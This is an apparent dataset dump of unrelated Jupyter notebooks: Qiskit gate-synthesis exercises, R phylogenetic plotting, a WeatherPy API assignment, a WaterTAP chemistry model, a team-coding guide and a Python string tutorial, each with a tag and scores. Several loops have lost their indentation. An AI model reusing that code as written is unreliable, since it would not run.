dataset.molecules_to_file("dataset-v1.1.smi", "smi")
dataset.visualize("dataset-v1.1.pdf", columns=8)
```
# Basic Synthesis of Single-Qubit Gates
```
from qiskit import *
from qiskit.tools.visualization import plot_histogram
%config InlineBackend.figure_format = 'svg' # Makes the images look nice
import numpy as np
```
## 1
Show that the Hadamard gate can be written in the following two forms
$$H = \frac{X+Z}{\sqrt{2}} \equiv \exp\left(i \frac{\pi}{2} \, \frac{X+Z}{\sqrt{2}}\right).$$
Here $\equiv$ is used to denote that the equality is valid up to a global phase, and hence that the resulting gates are physically equivalent.
Hint: it might even be easiest to prove that $e^{i\frac{\pi}{2} M} \equiv M$ for any matrix whose eigenvalues are all $\pm 1$, and that such matrices uniquely satisfy $M^2=I$.
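One way to flesh out the hint (a sketch of the argument, not the only route): any $M$ with $M^2 = I$ satisfies
$$ e^{i\frac{\pi}{2} M} = \cos\left(\tfrac{\pi}{2}\right) I + i \sin\left(\tfrac{\pi}{2}\right) M = iM \equiv M,$$
and $\left(\frac{X+Z}{\sqrt{2}}\right)^2 = \frac{X^2 + XZ + ZX + Z^2}{2} = I$ because $XZ = -ZX$. Writing out $\frac{X+Z}{\sqrt{2}}$ in the computational basis gives exactly the Hadamard matrix, which yields both forms.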
## 2
The Hadamard can be constructed from `rx` and `rz` operations as
$$ R_x(\theta) = e^{i\frac{\theta}{2} X}, ~~~ R_z(\theta) = e^{i\frac{\theta}{2} Z},\\ H \equiv \lim_{n\rightarrow\infty} \left( ~R_x\left(\frac{\theta}{n}\right) ~~R_z \left(\frac{\theta}{n}\right) ~\right)^n.$$
for some suitably chosen $\theta$. When implemented for finite $n$, the resulting gate will be an approximation to the Hadamard whose error decreases with $n$.
The following shows an example of this implemented with Qiskit with an incorrectly chosen value of $\theta$ (and with the global phase ignored).
* Determine the correct value of $\theta$.
* Show that the error (when using the correct value of $\theta$) decreases quadratically with $n$.
```
q = QuantumRegister(1)
c = ClassicalRegister(1)
error = {}
for n in range(1,11):
# Create a blank circuit
qc = QuantumCircuit(q,c)
# Implement an approximate Hadamard
theta = np.pi # here we incorrectly choose theta=pi
for j in range(n):
qc.rx(theta/n,q[0])
qc.rz(theta/n,q[0])
# We need to measure how good the above approximation is. Here's a simple way to do this.
# Step 1: Use a real hadamard to cancel the above approximation.
    # For a good approximation, the qubit will return to state 0. For a bad one, it will end up as some superposition.
qc.h(q[0])
# Step 2: Run the circuit, and see how many times we get the outcome 1.
# Since it should return 0 with certainty, the fraction of 1s is a measure of the error.
qc.measure(q,c)
shots = 20000
job = execute(qc, Aer.get_backend('qasm_simulator'),shots=shots)
try:
error[n] = (job.result().get_counts()['1']/shots)
except:
pass
plot_histogram(error)
```
## 3
An improved version of the approximation can be found from,
$$H \equiv \lim_{n\rightarrow\infty} \left( ~ R_z \left(\frac{\theta}{2n}\right)~~ R_x\left(\frac{\theta}{n}\right) ~~ R_z \left(\frac{\theta}{2n}\right) ~\right)^n.$$
Implement this, and investigate the scaling of the error.
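A minimal sketch of one way to implement this, reusing the error measure from the cell above; it assumes $\theta = \pi/\sqrt{2}$, the value implied by the definitions in part 2 (treat that as something to verify rather than as given).
```
q = QuantumRegister(1)
c = ClassicalRegister(1)

error2 = {}
theta = np.pi / np.sqrt(2)  # candidate value from part 2 -- verify it yourself
for n in range(1, 11):
    qc = QuantumCircuit(q, c)
    # Symmetric decomposition: Rz(theta/2n) Rx(theta/n) Rz(theta/2n), repeated n times
    for _ in range(n):
        qc.rz(theta / (2 * n), q[0])
        qc.rx(theta / n, q[0])
        qc.rz(theta / (2 * n), q[0])
    # Cancel with an exact Hadamard and measure; the fraction of 1s estimates the error
    qc.h(q[0])
    qc.measure(q, c)
    shots = 20000
    job = execute(qc, Aer.get_backend('qasm_simulator'), shots=shots)
    error2[n] = job.result().get_counts().get('1', 0) / shots

plot_histogram(error2)
```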
```
import qiskit
qiskit.__qiskit_version__
```
```
library("ape")
library("ggplot2")
library("ggtree")
library(rphylopic)
nwk <- "../newick/species_of_interest.nh"
tree <- read.tree(nwk)
tree
ggtree(tree) + geom_treescale() + geom_tiplab()
ggtree(tree) + geom_treescale()
ggtree(tree, branch.length="none") %>% phylopic("9baeb207-5a37-4e43-9d9c-4cfb9038c0cc", color="darkgreen", alpha=.8, node=4)
person <- name_search(text = "Chimp", options = "namebankID")[[1]]
person
person <- name_search(text = "ornithorhynchus anatinus", options = "namebankID")[[1]]
person
info <- read.csv("../newick/tree_info.csv")
info
library(ape)
tree <- read.nexus("../newick/tree.nex")
phylopic_info <- data.frame(node = c(124, 113, 110, 96, 89, 70),
phylopic = c("7fb9bea8-e758-4986-afb2-95a2c3bf983d",
"bac25f49-97a4-4aec-beb6-f542158ebd23",
"f598fb39-facf-43ea-a576-1861304b2fe4",
"aceb287d-84cf-46f1-868c-4797c4ac54a8",
"0174801d-15a6-4668-bfe0-4c421fbe51e8",
"72f2f854-f3cd-4666-887c-35d5c256ab0f"),
species = c("galagoids", "lemurs", "tarsiers",
"cebids", "hominoids", "cercopithecoids"))
pg <- ggtree(tree)
pg %<+% phylopic_info + geom_nodelab(aes(image=phylopic), geom="phylopic", alpha=.5, color='steelblue')
nwk <- "../newick/species_of_interest.nh"
info <- read.csv("../newick/tree_info.csv")
tree <- read.tree(nwk)
p <- ggtree(tree,branch.length=T, layout="circular") %<+% info + xlim(NA, 6)
p + geom_tiplab(aes(image= imageURL), geom="phylopic", offset=1.75, align=T, size=.06, hjust=1.66, color='steelblue') +
geom_tiplab(geom="label", offset=0.875, hjust=0.754) + theme(plot.margin=grid::unit(c(0,0,0,0), "mm"))
#p <- ggtree(tree) %<+% phylopic_info
#p + geom_tiplab() + geom_nodelab(aes(image=phylopic), geom="phylopic", alpha=.5, color='steelblue')
#geom_tiplab(aes(image= imageURL), geom="image", offset=2, align=T, size=.16, hjust=0) +
# geom_tiplab(geom="label", offset=1, hjust=.5)
ggsave('../figs/phylogenetic_tree_phylopic.pdf', width = 8, height = 8)
ggtree(tree, branch.length="none") %>% geom_tiplab("9baeb207-5a37-4e43-9d9c-4cfb9038c0cc",
color="darkgreen", alpha=.8)
#geom_nodelab(aes(image="9baeb207-5a37-4e43-9d9c-4cfb9038c0cc"), geom="phylopic", alpha=.5, color='steelblue')
#phylopic("9baeb207-5a37-4e43-9d9c-4cfb9038c0cc", color="darkgreen", alpha=.8, node=4) %>%
# phylopic("2ff4c7f3-d403-407d-a430-e0e2bc54fab0", color="darkcyan", alpha=.8, node=2) %>%
# phylopic("a63a929b-1b92-4e27-93c6-29f65184017e", color="steelblue", alpha=.8, node=3)
"mus_musculus" = c("2a557f56-b400-4d51-9d4a-1d74b7ed1cf9")
```
# WeatherPy
----
#### Note
* Instructions have been included for each segment. You do not have to follow them exactly, but they are included to help you think through the steps.
```
# Dependencies and Setup
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import requests
import time
from scipy.stats import linregress
# Import API key
from api_keys import weather_api_key
# Incorporated citipy to determine city based on latitude and longitude
from citipy import citipy
# Output File (CSV)
output_data_file = "output_data/cities.csv"
# Range of latitudes and longitudes
lat_range = (-90, 90)
lng_range = (-180, 180)
```
## Generate Cities List
```
# List for holding lat_lngs and cities
lat_lngs = []
cities = []
# Create a set of random lat and lng combinations
lats = np.random.uniform(lat_range[0], lat_range[1], size=1500)
lngs = np.random.uniform(lng_range[0], lng_range[1], size=1500)
lat_lngs = zip(lats, lngs)
# Identify nearest city for each lat, lng combination
for lat_lng in lat_lngs:
city = citipy.nearest_city(lat_lng[0], lat_lng[1]).city_name
# If the city is unique, then add it to a our cities list
if city not in cities:
cities.append(city)
# Print the city count to confirm sufficient count
len(cities)
```
### Perform API Calls
* Perform a weather check on each city using a series of successive API calls.
* Include a print log of each city as it's being processed (with the city number and city name).
```
# Make a request for each of the indices
url = "http://api.openweathermap.org/data/2.5/weather?q="
response_json = []
for city in range(len(cities)):
    print(f"Processing Record {city + 1} of {len(cities)} | {cities[city]}")
    # Request the current weather for this city
    post_response = requests.get(url + cities[city] + "&appid=" + weather_api_key)
    # Save the response JSON
    response_json.append(post_response.json())
```
### Convert Raw Data to DataFrame
* Export the city data into a .csv.
* Display the DataFrame (a sketch of one way to do both steps follows below).
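A minimal sketch of one way to complete this step, using the `response_json` list built above. The field names (`name`, `coord`, `main`, `clouds`, `wind`, `sys`, `dt`) follow the OpenWeatherMap current-weather response format; the `city_data` name matches the comments in the humidity-check cell below, and skipping failed lookups is an illustration choice rather than part of the original instructions.
```
# Flatten the saved JSON responses into a DataFrame.
# Temperatures are in Kelvin unless a "units" parameter was added to the request.
# Responses without a "main" block (e.g. city not found) are skipped.
records = []
for resp in response_json:
    if "main" not in resp:
        continue
    records.append({
        "City": resp["name"],
        "Lat": resp["coord"]["lat"],
        "Lng": resp["coord"]["lon"],
        "Max Temp": resp["main"]["temp_max"],
        "Humidity": resp["main"]["humidity"],
        "Cloudiness": resp["clouds"]["all"],
        "Wind Speed": resp["wind"]["speed"],
        "Country": resp["sys"].get("country"),
        "Date": resp["dt"],
    })
city_data = pd.DataFrame(records)
city_data.to_csv(output_data_file, index=False)
city_data.head()
```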
## Inspect the data and remove the cities where the humidity > 100%.
----
Skip this step if there are no cities that have humidity > 100%.
```
# Get the indices of cities that have humidity over 100%.
# Make a new DataFrame equal to the city data to drop all humidity outliers by index.
# Passing "inplace=False" will make a copy of the city_data DataFrame, which we call "clean_city_data".
```
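A minimal completion of the steps listed above, assuming the `city_data` DataFrame and `Humidity` column from the earlier sketch:
```
# Indices of cities reporting humidity over 100% (usually an empty set)
humid_idx = city_data[city_data["Humidity"] > 100].index
# drop() returns a copy, so the original city_data DataFrame is left untouched
clean_city_data = city_data.drop(humid_idx)
clean_city_data.head()
```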
## Plotting the Data
* Use proper labeling of the plots using plot titles (including date of analysis) and axes labels.
* Save the plotted figures as .pngs.
## Latitude vs. Temperature Plot
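A sketch of this first plot, assuming the `clean_city_data` DataFrame and column names from the sketches above; the three plots that follow use the same pattern with a different y-column, and the .png filename is arbitrary.
```
# Latitude vs. max temperature scatter plot
plt.scatter(clean_city_data["Lat"], clean_city_data["Max Temp"], edgecolor="black", alpha=0.8)
plt.title(f"City Latitude vs. Max Temperature ({time.strftime('%Y-%m-%d')})")
plt.xlabel("Latitude")
plt.ylabel("Max Temperature")
plt.grid(True)
plt.savefig("output_data/lat_vs_temp.png")
plt.show()
```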
## Latitude vs. Humidity Plot
## Latitude vs. Cloudiness Plot
## Latitude vs. Wind Speed Plot
## Linear Regression
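All eight regressions below follow the same recipe, so a small helper avoids repeating the boilerplate. This is a sketch that assumes the `clean_city_data` DataFrame from the earlier sketches; `linregress` is already imported at the top of the notebook.
```
# Reusable helper for the hemisphere regressions below
def plot_regression(df, x_col, y_col, title):
    x, y = df[x_col], df[y_col]
    slope, intercept, rvalue, pvalue, stderr = linregress(x, y)
    plt.scatter(x, y, alpha=0.8)
    plt.plot(x, slope * x + intercept, color="red")
    plt.title(f"{title} (r = {rvalue:.2f})")
    plt.xlabel(x_col)
    plt.ylabel(y_col)
    plt.show()

northern = clean_city_data[clean_city_data["Lat"] >= 0]
southern = clean_city_data[clean_city_data["Lat"] < 0]
plot_regression(northern, "Lat", "Max Temp", "Northern Hemisphere - Max Temp vs. Latitude")
plot_regression(southern, "Lat", "Max Temp", "Southern Hemisphere - Max Temp vs. Latitude")
```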
#### Northern Hemisphere - Max Temp vs. Latitude Linear Regression
#### Southern Hemisphere - Max Temp vs. Latitude Linear Regression
#### Northern Hemisphere - Humidity (%) vs. Latitude Linear Regression
#### Southern Hemisphere - Humidity (%) vs. Latitude Linear Regression
#### Northern Hemisphere - Cloudiness (%) vs. Latitude Linear Regression
#### Southern Hemisphere - Cloudiness (%) vs. Latitude Linear Regression
#### Northern Hemisphere - Wind Speed (mph) vs. Latitude Linear Regression
#### Southern Hemisphere - Wind Speed (mph) vs. Latitude Linear Regression
|
github_jupyter
|
# Dependencies and Setup
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import requests
import time
from scipy.stats import linregress
# Import API key
from api_keys import weather_api_key
# Incorporated citipy to determine city based on latitude and longitude
from citipy import citipy
# Output File (CSV)
output_data_file = "output_data/cities.csv"
# Range of latitudes and longitudes
lat_range = (-90, 90)
lng_range = (-180, 180)
# List for holding lat_lngs and cities
lat_lngs = []
cities = []
# Create a set of random lat and lng combinations
lats = np.random.uniform(lat_range[0], lat_range[1], size=1500)
lngs = np.random.uniform(lng_range[0], lng_range[1], size=1500)
lat_lngs = zip(lats, lngs)
# Identify nearest city for each lat, lng combination
for lat_lng in lat_lngs:
city = citipy.nearest_city(lat_lng[0], lat_lng[1]).city_name
    # If the city is unique, then add it to our cities list
    if city not in cities:
        cities.append(city)
# Print the city count to confirm sufficient count
len(cities)
# Make a request for each of the indices
url = "http://api.openweathermap.org/data/2.5/weather?q="
response_json = []
for city in range(len(cities)):
    print(f"Processing Record {city + 1} of {len(cities)} | {cities[city]}")
    # Request the current weather for this city
    post_response = requests.get(url + cities[city] + "&appid=" + weather_api_key)
    # Save the response JSON
    response_json.append(post_response.json())
# Get the indices of cities that have humidity over 100%.
# Make a new DataFrame equal to the city data to drop all humidity outliers by index.
# Passing "inplace=False" will make a copy of the city_data DataFrame, which we call "clean_city_data".
| 0.412294 | 0.82963 |
# Carbonic Acid Example
**STEPS**
1. Connect to database
2. Create a base 'thermo' config for liquid only system with FpcTP state variables
3. Add all components for carbonic acid problem to the base 'thermo' config
4. Create a base 'reaction' config
5. Find and add reactions to 'reaction' config based on the component list
6. Build an IDAES model from the database generated configs
7. Check the IDAES model for errors
## 1. Connect to database
```
from watertap.edb import ElectrolyteDB
print("connecting to " + str(ElectrolyteDB.DEFAULT_URL))
db = ElectrolyteDB()
```
## 2. Create base 'thermo' config
Here, we grab the "thermo_Liq_FpcTP" base, which will likely be the most common for simple acid systems.
```
thermo_base = db.get_base("thermo_Liq_FpcTP")
```
## 3. Add components to 'thermo' base
In this case, we know that our system is water + carbonic acid, which will produce the following species.
```
comp_list = ["H2O", "H_+", "OH_-", "H2CO3", "HCO3_-", "CO3_2-"]
comps = db.get_components(component_names=comp_list)
for comp_obj in comps:
print("Adding " + str(comp_obj.name) + "" )
thermo_base.add(comp_obj)
```
## 4. Create base 'reaction' config
Unlike in the prior example, here we are going to place all reactions in a separate configuration dictionary and declare those reactions as equilibrium. This is likely the most common way to handle reactions in WaterTAP.
```
react_base = db.get_base("reaction")
```
## 5. Find and add reactions to 'reaction' base
The reactions that should be found include 'H2O_Kw', 'H2CO3_Ka1', and 'H2CO3_Ka2'. These are the deprotonation reactions of the acids in the system.
```
react_obj = db.get_reactions(component_names=comp_list)
for r in react_obj:
print("Found reaction: " + str(r.name))
react_base.add(r)
```
## 6. Build an IDAES model
After we have grabbed all necessary information from the database, the formatted configuration dictionaries can be obtained from the 'base' objects we created in steps 2 & 4. The configurations are accessible via *_base.idaes_config. Passing those configuration dictionaries to the IDAES objects (GenericParameterBlock and GenericReactionParameterBlock) allows us to build the IDAES model. In this case, we build an EquilibriumReactor model from those property blocks.
```
# Import specific pyomo objects
from pyomo.environ import (
ConcreteModel,
)
# Import the idaes objects for Generic Properties and Reactions
from idaes.generic_models.properties.core.generic.generic_property import (
GenericParameterBlock,
)
from idaes.generic_models.properties.core.generic.generic_reaction import (
GenericReactionParameterBlock,
)
# Import the idaes object for the EquilibriumReactor unit model
from idaes.generic_models.unit_models.equilibrium_reactor import EquilibriumReactor
# Import the core idaes objects for Flowsheets and types of balances
from idaes.core import FlowsheetBlock
thermo_config = thermo_base.idaes_config
reaction_config = react_base.idaes_config
model = ConcreteModel()
model.fs = FlowsheetBlock(default={"dynamic": False})
model.fs.thermo_params = GenericParameterBlock(default=thermo_config)
model.fs.rxn_params = GenericReactionParameterBlock(
default={"property_package": model.fs.thermo_params, **reaction_config}
)
model.fs.unit = EquilibriumReactor(
default={
"property_package": model.fs.thermo_params,
"reaction_package": model.fs.rxn_params,
"has_rate_reactions": False,
"has_equilibrium_reactions": True,
"has_heat_transfer": False,
"has_heat_of_reaction": False,
"has_pressure_change": False,
}
)
```
## 7. Check IDAES model for errors
In this last step, we probe the created model to make sure everything is ok. We first check to make sure that the units of the model are consistent, then we can check the degrees of freedom. In this particular case, we expect 8 degrees of freedom.
The number of degrees of freedom will be problem dependent. In this case, our degrees stem from (1) pressure, (2) temperature, and (3-8) the individual species-phase pairs:
- (3) (H2O , Liq)
- (4) (H_+ , Liq)
- (5) (OH_- , Liq)
- (6) (H2CO3 , Liq)
- (7) (HCO3_- , Liq)
- (8) (CO3_2- , Liq)
```
from pyomo.util.check_units import assert_units_consistent
from idaes.core.util.model_statistics import (
degrees_of_freedom,
)
assert_units_consistent(model)
assert degrees_of_freedom(model) == 8
```
|
github_jupyter
|
from watertap.edb import ElectrolyteDB
print("connecting to " + str(ElectrolyteDB.DEFAULT_URL))
db = ElectrolyteDB()
thermo_base = db.get_base("thermo_Liq_FpcTP")
comp_list = ["H2O", "H_+", "OH_-", "H2CO3", "HCO3_-", "CO3_2-"]
comps = db.get_components(component_names=comp_list)
for comp_obj in comps:
print("Adding " + str(comp_obj.name) + "" )
thermo_base.add(comp_obj)
react_base = db.get_base("reaction")
react_obj = db.get_reactions(component_names=comp_list)
for r in react_obj:
print("Found reaction: " + str(r.name))
react_base.add(r)
# Import specific pyomo objects
from pyomo.environ import (
ConcreteModel,
)
# Import the idaes objects for Generic Properties and Reactions
from idaes.generic_models.properties.core.generic.generic_property import (
GenericParameterBlock,
)
from idaes.generic_models.properties.core.generic.generic_reaction import (
GenericReactionParameterBlock,
)
# Import the idaes object for the EquilibriumReactor unit model
from idaes.generic_models.unit_models.equilibrium_reactor import EquilibriumReactor
# Import the core idaes objects for Flowsheets and types of balances
from idaes.core import FlowsheetBlock
thermo_config = thermo_base.idaes_config
reaction_config = react_base.idaes_config
model = ConcreteModel()
model.fs = FlowsheetBlock(default={"dynamic": False})
model.fs.thermo_params = GenericParameterBlock(default=thermo_config)
model.fs.rxn_params = GenericReactionParameterBlock(
default={"property_package": model.fs.thermo_params, **reaction_config}
)
model.fs.unit = EquilibriumReactor(
default={
"property_package": model.fs.thermo_params,
"reaction_package": model.fs.rxn_params,
"has_rate_reactions": False,
"has_equilibrium_reactions": True,
"has_heat_transfer": False,
"has_heat_of_reaction": False,
"has_pressure_change": False,
}
)
from pyomo.util.check_units import assert_units_consistent
from idaes.core.util.model_statistics import (
degrees_of_freedom,
)
assert_units_consistent(model)
assert degrees_of_freedom(model) == 8
| 0.655667 | 0.837952 |
# Coding in Teams
Collaborative coding is so essential to the process of solving interesting finance problems that it underlies the [objectives](../about/objectives) at the front of this website.
This page is focused on helping your teams attack the project in the most effective way. And it includes a few things that will push your existing GitHub comfort level up and make your team more productive.
```{dropdown} **Q: How should you "meet"?**
A: It's up to you! Be entrepreneurial and run your group as you all see fit. (WhatsApp, groupme, google doc, zoom, skype...)
```
```{dropdown} **Q: How should you approach working concurrently on the project?**
A: You basically have three approaches:
1. Sequentially divide tasks and conquer, e.g. Person A does part 1, Person B does part 2 after A is done.
- _I.e. in asgn-05 we had three files: download_wiki, measure_risk, and analysis. You can split up your project in a similar fashion._
- Main advantages: Specialization + this "gives ownership" to one person for each part
2. Co-work on a task simultaneously: Persons A and B do a Zoom screen-share meeting and co-code on person A's computer via screen share + remote control. Advantage: More brainpower, and good when the whole group is stuck.
3. Separately attack the same task, then combine your answers: Persons A and B separately do part 1, and compare answers/approach, and put together a finalized solution to part 1. This creates duplicate and discarded work product, but will generate more ideas on getting to the solution.
```
```{dropdown} **Q: How do we work in the project repo "at the same time"?**
The main issue is that two people might make conflicting changes. E.g., Johnny added a line to `data.py` but Cindy deleted a line from `data.py`.
A: You have, basically, two approaches, and you might use both at different points of the project:
1. **Free-for-all approach.** _Everyone works in the "master" branch of the repo all the time. This is what your default instinct might be. It can work, but you will probably have to fix merge conflicts to proceed at some point._
1. **The "branching" approach.** _Basically, you create a clone of the "master" branch to work on, and when you've finished your changes, you create a "pull request" where you ask the main project's owner (you and your own team, in this case) to pull your branch's changes into the master branch. See the demo video below._
```
```{warning} Warning! Warning! Warning!
**FOLLOW THESE RULES EVERY SINGLE TIME YOU WORK ON CODE OR DO ANYTHING IN THE REPO**
1. BEFORE YOU START ANY WORK FOR THE DAY: Go to GH Desktop and "Fetch/Pull" origin
2. WHEN YOU ARE DONE WITH A WORKING SESSION: Clear your code, rerun all, save file, then push to cloud
If you forget to fetch/pull before you start (and someone made a change on the github repo since you last synced), or if someone is working at the same time (and pushes a change to the github repo that conflicts with a change you made), you are likely to receive a "Merge Conflict" notification from GH Desktop.
```
```{admonition} Other Recommendations and Advice
:class: tip
1. Your most experienced coder might be given "CEO" status over the repo and "leads the way" on pull requests and gives guidance on merge conflicts.
2. Instead of putting the entire project in one ipynb file, structure the project like the latest assignment:
- One code file to download each input needed,
- One code file to parse/transform each input,
- One "get_all_data" code file that, if executed, would run all files above
- One code to build the analysis sample, explore it, and analyze it
3. It's better to over communicate than under communicate, especially in our virtual world
```
<p style="font-size:2em"> Collaboration as a group </p>
**I would love your feedback on how you deal with the asynchronous work problem!**
- Please let me know what issues/problems your group runs into
- What solutions did you use (were they good or awful?)
- If your group has an easy time, or finds something that works well, please let me and your classmates know!
- Submit your experience on this via the discussion board
## Branching Demo
Above, I mentioned that one way that multiple people can work in the same repo at the same time is by "branching". Rather than explaining it, let's let one of our TAs do a walk through on how this can work!

<iframe width="560" height="315" src="https://www.youtube.com/embed/KuCzXlfF-pM" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
Here's the side text from the video:
- Open GH Desktop and create a toy repo
- start new branch "my work"
- add data/data.txt into folder (to simulate some work you've done)
- see how GH Desktop sees a change?
- click to try to switch branch (don't though)
- it says "leave changes on this branch or bring to master" --> only the branch you're "in" can see/push changes you make
- cancel
- commit to branch
- publish up to GH website
- view on GH
- switch branches to see the new files
- compare: you're able to merge
- can explain your argument for changes (to convince others to adopt in distributed projects), submit
- merge, confirm
- look at master branch - it should have data/data.txt
- create "cynthia_did_some_work.txt" which says inside: "while i was sleeping"
- go back to desktop like you're going to work on the project
- go to master... pulling origin would sync it but dont
- go to "my work" branch
- fetch / update from master: this gets the cynthia file, and I can continue
- push this new file back up to my own branch on GH's servers
- make a new fake work file
- publish/push
- pull request
- merge into main one more time
|
github_jupyter
| 0.001731 | 0.925162 |
|
# string and text
```
# Show the result of every expression in a cell, not just the last one
from IPython.core.interactiveshell import InteractiveShell
InteractiveShell.ast_node_interactivity = "all"
line = 'asdf fjdk; afed, fjek,asdf, foo'
import re
re.split(r'[;,\s]\s*', line)
```
* The re.split() function is very useful because it lets you specify several regex patterns for the delimiter at once.
* A simple way to check the beginning or end of a string is to use the str.startswith() or str.endswith() method.
* To check against several possibilities at once, put all of the candidate prefixes/suffixes into a tuple and pass it to startswith() or endswith().
* startswith() and endswith() give a very convenient way to test a string's start and end. You could do the same checks with slices, but the code is far less elegant.
```
filename = 'spam.txt'
filename.endswith('.txt')
filename.startswith('file:')
url = 'http://www.python.org'
url.startswith('http:')
filenames = [ 'Makefile', 'foo.c', 'bar.py', 'spam.c', 'spam.h' ]
[name.endswith('.py') for name in filenames]
# True if any of the filenames match
any(name.endswith('.py') for name in filenames)
```
## Matching strings with shell wildcard patterns
* If your code needs to match actual filenames, the glob module is usually the better choice.
* For more complex matching, use regular expressions and the re module.
```
from fnmatch import fnmatch, fnmatchcase
fnmatch('foo.txt', '*.txt')
fnmatch('foo.txt', '?oo.txt')
fnmatch('Dat45.csv', 'Dat[0-9]*')
names = ['Dat1.csv', 'Dat2.csv', 'config.ini', 'foo.py']
[name for name in names if fnmatch(name, 'Dat*.csv')]
```
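`fnmatchcase` is imported above but not demonstrated. `fnmatch()` follows the case conventions of the underlying operating system (case-insensitive on Windows, case-sensitive on most Unix-like systems), whereas `fnmatchcase()` always matches exactly as written:
```
# fnmatch() uses the operating system's case rules; fnmatchcase() is always case-sensitive
fnmatch('foo.TXT', '*.txt')      # True on Windows, False on most Unix-like systems
fnmatchcase('foo.TXT', '*.txt')  # False everywhere
fnmatchcase('foo.txt', '*.txt')  # True everywhere
```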
## Searching and replacing text
* For simple literal patterns, the str.replace() method is all you need.
* For more complicated patterns, use the sub() function from the re module.
```
text = 'yeah, but no, but yeah, but no, but yeah'
text
# Replaces every occurrence
text.replace('yeah', 'yep')
# Replace only the first two occurrences
text.replace('yeah', 'yep', 2)
```
## Case-insensitive searching and replacing
* To ignore case when working with text, pass the re.IGNORECASE flag to the re module functions you use.
```
text = 'UPPER PYTHON, lower python, Mixed Python'
# Find
re.findall('python', text, flags=re.IGNORECASE)
# Replace
re.sub('python', 'snake', text, flags=re.IGNORECASE)
```
## Stripping unwanted characters from strings
* The strip() method removes characters from the start or end of a string; lstrip() and rstrip() strip from the left and right respectively. By default they remove whitespace, but you can specify other characters.
* If you need to deal with characters in the middle of a string, reach for other techniques such as the replace() method or a regular-expression substitution.
```
# Whitespace stripping
s = ' hello world \n'
s
s.strip()
# From the left
s.lstrip()
s.rstrip()
# Character stripping
t = '-----hello====='
# Strip '-' from the left
t.lstrip('-')
# Strip both '-' and '='
t.strip('-=')
```
## Aligning text strings
* For basic alignment, use the string methods ljust(), rjust(), and center().
* The format() function also makes alignment easy: use the <, >, or ^ character followed by the desired field width.
* To use a fill character other than a space, put it just before the alignment character.
```
text = 'Hello World'
text.ljust(20)
text.rjust(20)
text.center(20)
text.ljust(20, '*')
text.center(20, '*')
format(text, '>20')
format(text, '<20')
format(text, '^20')
format(text, '=>20s')
'{:>10s} {:>10s}'.format('Hello', 'World')
```
## Combining and concatenating strings
* If the strings you want to combine live in a sequence or other iterable, the fastest way is to use the join() method.
* If you are only joining a handful of strings, the plus operator (+) is usually good enough.
```
str1 = 'hello'
str2 = 'world'
# Produce a tuple from both strings
*str1, *str2
(*str1, *str2)
# list
[*str1, *str2]
# set
{*str1, *str2}
#dict
{key: value for key, value in zip(str1, str2)}
str1.join(str2)
str1 + str2
parts = ['Is', 'Chicago', 'Not', 'Chicago?']
' '.join(parts)
x = [1, 2, 4, -1, 0, 2]
def sam(arg):
yield(arg)
for o in sam(x):
o
```
## Interpolating variables in strings
* Python has no direct support for simply substituting variable values inside strings, but the problem can be handled with the string format() method.
* If the values to be substituted can be found in variables, you can combine format_map() and vars().
```
s = '{name} has {n} messages.'
s.format(name='Guido', n=37)
name = 'Guido'
n = 37
s.format_map(vars())
```
## Reformatting text to a fixed column width
* Use the textwrap module to reformat a string for output.
```
# As in a shell, a backslash at the end of a line continues the statement onto the next line
s = "Look into my eyes, look into my eyes, the eyes, the eyes, \
the eyes, not around the eyes, don't look around the eyes, \
look into my eyes, you're under."
s
```
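The cell above only builds the long string; here is a short sketch of actually reflowing it with `textwrap`:
```
import textwrap
# Reflow the string to a 40-column width
print(textwrap.fill(s, 40))
# Indent options are available too, e.g. a hanging indent
print(textwrap.fill(s, 40, subsequent_indent='    '))
```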
## Performing string operations on byte strings
* Byte strings support most of the same built-in operations as text strings.
* The same operations also work on byte arrays.
```
data = b'Hello World'
data
data[0:5]
data.startswith(b'Hello')
data.split()
data.replace(b'Hello', b'Hello Cruel')
data = bytearray(b'Hello World')
data
data[0:5]
data.startswith(b'Hello')
data.split()
data.replace(b'Hello', b'Hello Cruel')
```
|
github_jupyter
|
# Show the result of every expression in a cell, not just the last one
from IPython.core.interactiveshell import InteractiveShell
InteractiveShell.ast_node_interactivity = "all"
line = 'asdf fjdk; afed, fjek,asdf, foo'
import re
re.split(r'[;,\s]\s*', line)
filename = 'spam.txt'
filename.endswith('.txt')
filename.startswith('file:')
url = 'http://www.python.org'
url.startswith('http:')
filenames = [ 'Makefile', 'foo.c', 'bar.py', 'spam.c', 'spam.h' ]
[name.endswith('.py') for name in filenames]
# True if any of the filenames match
any(name.endswith('.py') for name in filenames)
from fnmatch import fnmatch, fnmatchcase
fnmatch('foo.txt', '*.txt')
fnmatch('foo.txt', '?oo.txt')
fnmatch('Dat45.csv', 'Dat[0-9]*')
names = ['Dat1.csv', 'Dat2.csv', 'config.ini', 'foo.py']
[name for name in names if fnmatch(name, 'Dat*.csv')]
text = 'yeah, but no, but yeah, but no, but yeah'
text
# Replaces every occurrence
text.replace('yeah', 'yep')
# Replace only the first two occurrences
text.replace('yeah', 'yep', 2)
text = 'UPPER PYTHON, lower python, Mixed Python'
# Find
re.findall('python', text, flags=re.IGNORECASE)
# Replace
re.sub('python', 'snake', text, flags=re.IGNORECASE)
# Whitespace stripping
s = ' hello world \n'
s
s.strip()
# From the left
s.lstrip()
s.rstrip()
# Character stripping
t = '-----hello====='
# Strip '-' from the left
t.lstrip('-')
# Strip both '-' and '='
t.strip('-=')
text = 'Hello World'
text.ljust(20)
text.rjust(20)
text.center(20)
text.ljust(20, '*')
text.center(20, '*')
format(text, '>20')
format(text, '<20')
format(text, '^20')
format(text, '=>20s')
'{:>10s} {:>10s}'.format('Hello', 'World')
str1 = 'hello'
str2 = 'world'
# Produce a tuple from both strings
*str1, *str2
(*str1, *str2)
# list
[*str1, *str2]
# set
{*str1, *str2}
#dict
{key: value for key, value in zip(str1, str2)}
str1.join(str2)
str1 + str2
parts = ['Is', 'Chicago', 'Not', 'Chicago?']
' '.join(parts)
x = [1, 2, 4, -1, 0, 2]
def sam(arg):
yield(arg)
for o in sam(x):
o
s = '{name} has {n} messages.'
s.format(name='Guido', n=37)
name = 'Guido'
n = 37
s.format_map(vars())
# As in a shell, a backslash at the end of a line continues the statement onto the next line
s = "Look into my eyes, look into my eyes, the eyes, the eyes, \
the eyes, not around the eyes, don't look around the eyes, \
look into my eyes, you're under."
s
data = b'Hello World'
data
data[0:5]
data.startswith(b'Hello')
